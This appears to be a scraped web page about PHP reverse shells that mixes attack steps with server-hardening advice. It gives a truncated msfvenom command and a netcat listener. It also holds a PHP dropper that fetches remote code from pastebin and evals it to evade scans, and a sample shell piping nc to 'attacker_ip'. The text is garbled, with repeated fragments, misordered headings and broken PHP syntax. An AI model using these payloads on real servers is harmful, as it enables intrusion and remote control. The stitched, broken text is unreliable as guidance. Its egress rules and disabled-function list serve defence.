Reverse Shell Php
A PHP reverse shell is a script that, when executed on a target web server, initiates an outbound connection back to your machine, providing a command-line interface to the server. This technique is commonly used during penetration testing to gain interactive access after discovering a file upload or code execution vulnerability. 1. Obtain a Reverse Shell Script
The most reliable way to establish a connection is to use an established, pre-written script.
Pentest Monkey PHP Reverse Shell: Widely considered the industry standard for PHP web shells. It provides a full interactive shell that supports interactive programs like ssh or su.
You can download it from the Pentest Monkey GitHub repository.
Kali Linux Local Copy: If you are using Kali Linux, a copy is already available at /usr/share/webshells/php/php-reverse-shell.php. Reverse Shell Php
MSFVenom: You can generate a custom payload using Metasploit with the following command:msfvenom -p php/meterpreter_reverse_tcp LHOST= 2. Configure the Script
Before uploading, you must edit the script to point back to your machine. Open the .php file in a text editor like nano. Locate the $ip and $port variables.
Change $ip to your attacking machine's IP address (use your VPN IP if on a platform like Hack The Box).
Set $port to any open port on your machine (e.g., 4444 or 1234). 3. Start a Listener A PHP reverse shell is a script that,
On your attacking machine, you must set up a listener to "catch" the incoming connection. RootMe (CTF Walkthrough). A TryHackMe Lab | by Marduk I Am
4. Multi-Stage Payloads
Instead of embedding the entire shell in one file, a small "dropper" PHP script fetches a secondary payload from a remote server:
<?php $code = file_get_contents('https://pastebin.com/raw/xyz123'); eval($code); ?>
This bypasses static file scans.
3. Restrict Outbound Connections (Egress Filtering)
- Use a firewall to block outbound traffic on suspicious ports (e.g., 4444, 1337, 9001, or any non-essential port).
- Allow only necessary outbound services (HTTP/HTTPS on 80/443, DNS on 53, etc.).
2. Monitor Outbound Traffic
Reverse shells require outbound connections. Use firewalls to restrict outbound traffic from your web server: This bypasses static file scans
- Web servers should only talk to databases (port 3306, 5432) and maybe LDAP.
- Block all unsolicited outbound TCP connections to arbitrary high ports (>1024).
- Allow only port 80/443 to specific CDNs or APIs.
Example Iptables rule:
iptables -A OUTPUT -p tcp --dport 4444 -j DROP
iptables -A OUTPUT -p tcp --dport 4445:5555 -j DROP
2. Disable Dangerous PHP Functions
In php.ini, set:
disable_functions = exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec, fsockopen, pfsockopen, socket_create
Note: Many reverse shells use fsockopen or socket_create. Disabling these breaks a wide range of shells.
PHP Reverse Shell Code
Here's an example of a simple PHP reverse shell code:
<?php
$host = 'attacker_ip';
$port = 1234;
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = proc_open("nc $host $port", $descriptorspec, $pipes);
if (is_resource($process))
while (!feof($pipes[1]))
$output = fread($pipes[1], 1024);
echo $output;
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
?>
This code establishes a connection to the attacker's machine (attacker_ip:1234) using the nc command (Netcat). Once connected, the attacker can execute system commands on the victim's machine.
What is a Reverse Shell?
A reverse shell is a shell that runs on a victim's machine and connects back to the attacker's machine, allowing the attacker to execute commands remotely. Unlike a traditional shell, where the attacker initiates a connection to the victim's machine, a reverse shell initiates a connection from the victim's machine to the attacker's machine.
Step 1 – Attacker starts listener
nc -lvnp 4444
-llisten mode-vverbose-nno DNS-pport
